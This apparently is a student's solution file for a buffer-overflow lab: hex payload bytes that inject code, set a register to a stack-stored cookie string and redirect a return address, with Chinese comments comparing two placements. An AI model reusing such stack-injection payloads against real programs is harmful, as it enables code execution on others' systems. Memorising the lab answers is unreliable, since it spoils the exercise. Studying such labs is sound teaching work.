/*
  方法一 ：
  直接调用cbuf，一样的东西比较一定相等。
  movq $0x000000005561dc13, %rdi
  pushq $0x4018fa
  ret
*/


35 39 62 39 39 37 66 61 00 /* cookie : 0x59b997fa 其实是用不上的 */
61 61 61 61 61 61 61 61 61 61
48 c7 c7 13 dc 61 55 /* 这个地址就是hexnmatch中存放cookie的地方, 因为random() 伪随机 */
68 fa 18 40 00
c3
61 61 61 61 61 61 61 61
8B dc 61 55 00 00 00 00


/*
方法二：
  把cookie放在test栈空间上。这个栈空间应该不是test的返回栈指针，而是栈帧。
  不然，cookie会被后面的栈帧数据覆盖掉。
  也就是放在40 + 8 + 8，放在后面的后面。
  # 指令
  movq $0x000000005561dca8, %rdi
  pushq $0x4018fa
  ret
*/

/*
48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3
61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 /* cookie : 0x59b997fa */
*/